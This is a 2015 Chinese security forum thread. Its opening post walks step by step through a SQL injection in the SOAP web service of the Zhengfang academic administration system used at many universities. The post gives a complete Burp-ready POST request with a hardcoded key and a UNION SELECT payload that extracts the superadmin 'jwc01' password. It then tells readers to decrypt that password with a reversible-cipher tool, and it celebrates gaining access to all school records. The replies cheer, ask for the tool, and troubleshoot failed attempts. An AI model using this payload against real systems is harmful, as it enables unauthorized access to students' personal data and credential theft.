请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 16919|回复: 236

正方教务系统post型xml注入

  [复制链接]
  • TA的每日心情
    开心
    2016-2-2 20:06
  • 签到天数: 12 天

    [LV.3]偶尔看看II

    发表于 2015-10-22 08:36:19 | 显示全部楼层 |阅读模式
    作者: @ssslclc
    漏洞产生的原因正方是提供的webservice服务接口过滤不严造成的。我们知道正方的教务系统全国有1000多所学校在用,正好我的学校也在用,于是就用我们学校开刀了。

    首先打开学校的教务系统:
    QQ图片20151022083114.png
    url后面加上:/service.asmx?op=GetStuCheckinInfo看看是否存在页面。
    像这样:xxx.edu.cn/service.asmx?op=GetStuCheckinInfo
    QQ图片20151022083137.png
    SOAP下面那段灰色背景的代码复制下来:

    POST /service.asmx HTTP/1.1
    Host: xxxx.edu.cn(修改为自己学校的教务处地址)
    Content-Type: text/xml; charset=utf-8
    Content-Length: length
    SOAPAction: "http://www.zf_webservice.com/GetStuCheckinInfo "

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <q1:GetStuCheckinInfo xmlns:q1="http://www.zf_webservice.com/GetStuCheckinInfo">
          <xh xsi:type="xsd:string">string</xh>
          <xnxq xsi:type="xsd:string">string</xnxq>
          <strKey xsi:type="xsd:string">string</strKey>
        </q1:GetStuCheckinInfo>
      </soap:Body>
    </soap:Envelope>



    把上面的代码复制到burpsuitRepeater里面。
    如图:
    QQ图片20151022083221.png
    代码中有三个地方的参数需要我们修改:

    XhxnxqstrKEY

    需要修改的原代码:
    <xh xsi:type="xsd:string">string</xh>             #填上学号(注入点在此处)
    <xnxq xsi:type="xsd:string">string</xnxq>         #填上学年学期
    <strKey xsi:type="xsd:string">string</strKey>    #填上KKKGZ2312(别问我为什么,我也不懂)


    修改后的源代码:

    POST /service.asmx HTTP/1.1
    Host: (填上学校教务系统地址)
    Content-Type: text/xml; charset=utf-8
    Content-Length: length
    SOAPAction: "http://www.zf_webservice.com/GetStuCheckinInfo "

    <?xml version="1.0" encoding="utf-8"?>
    <soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/" xmlns:tns="http://tempuri.org/" xmlns:types="http://tempuri.org/encodedTypes" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
      <soap:Body soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
        <q1:GetStuCheckinInfo xmlns:q1="http://www.zf_webservice.com/GetStuCheckinInfo">
         <xh xsi:type="xsd:string">222222' union select Null,kl,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from yhb where yhm='jwc01</xh>
          <xnxq xsi:type="xsd:string">2013-2014-1</xnxq>
          <strKey xsi:type="xsd:string">KKKGZ2312</strKey>
        </q1:GetStuCheckinInfo>
      </soap:Body>
    </soap:Envelope>

    为什么xh标签处处填入的是:
    222222' union select Null,kl,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null,Null from yhb where yhm='jwc01
    解释一下上述语句:
    yhb(用户表)是表的名字,yhm(用户名)是字段名,kl(口令)是字段名。Jwc01是正方的默认账户,拥有最高权限。正方的数据库资料网上都会有,可以自己查到。这里用的是union注入,其他注入形式请自行尝试。(应该都可行)

    将修改好后的复制在Burpsuir中的Repeater点击GO
    即可查看到返回:
    QQ图片20151022083308.png
    我们可以看到jwc01账户的kl已经出来了:是密文  )iRGyzX^+gREKA
    痛苦的时候来了,因为正方的的加密不是md5,是自己的加密方式,幸运的是乌云有一篇研究正方系统加密的方式的文章,且加密是可逆的。(由于着急编程很渣),于是找人问要来了解密软件,真的找了很久!终于找到了!
    QQ图片20151022083409.png
    只能说:k8哥哥  牛逼~

    游客,如果您要查看本帖隐藏内容请回复
    于是我得到了超级管理员的账户,全校的资料随便查询,萌萌哒~~
    QQ图片20151022083455.png


    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    2017-3-15 00:43
  • 签到天数: 130 天

    [LV.7]常住居民III

    发表于 2015-10-22 09:35:45 | 显示全部楼层
    好吊,我学校也是方正可惜了任何请求都被狗拦截了。顶顶
  • TA的每日心情
    慵懒
    7 天前
  • 签到天数: 169 天

    [LV.7]常住居民III

    发表于 2015-10-22 09:56:05 | 显示全部楼层
    我擦,,,这个6666
  • TA的每日心情
    擦汗
    2016-7-26 09:24
  • 签到天数: 97 天

    [LV.6]常住居民II

    发表于 2015-10-22 10:03:44 | 显示全部楼层
    这个在乌云上见过,只是为什么我发了回复过来的并没有密码,并不成功
  • TA的每日心情
    开心
    2016-2-2 20:06
  • 签到天数: 12 天

    [LV.3]偶尔看看II

     楼主| 发表于 2015-10-22 10:06:21 | 显示全部楼层
    听不见的告白 发表于 2015-10-22 10:03
    这个在乌云上见过,只是为什么我发了回复过来的并没有密码,并不成功

    细节上出现了问题,或者其他因素
  • TA的每日心情
    擦汗
    2016-8-16 12:54
  • 签到天数: 38 天

    [LV.5]常住居民I

    发表于 2015-10-22 10:34:15 | 显示全部楼层
    我想要那个揭秘工具啊~ ~·
  • TA的每日心情
    无聊
    8 小时前
  • 签到天数: 160 天

    [LV.7]常住居民III

    发表于 2015-10-22 10:35:32 | 显示全部楼层
    哈哈哈  牛逼、
  • TA的每日心情
    开心
    8 小时前
  • 签到天数: 398 天

    [LV.9]以坛为家II

    发表于 2015-10-22 10:36:10 | 显示全部楼层
    我来看看了
  • TA的每日心情
    擦汗
    2016-7-26 09:24
  • 签到天数: 97 天

    [LV.6]常住居民II

    发表于 2015-10-22 10:40:49 | 显示全部楼层
    admin 发表于 2015-10-22 10:06
    细节上出现了问题,或者其他因素

    估计是被拦截了,点GO没反应
  • TA的每日心情

    2017-2-14 18:39
  • 签到天数: 45 天

    [LV.5]常住居民I

    发表于 2015-10-22 11:02:55 | 显示全部楼层
    收藏了 谢LZ
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-3-30 18:40 , Processed in 0.232434 second(s), 35 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表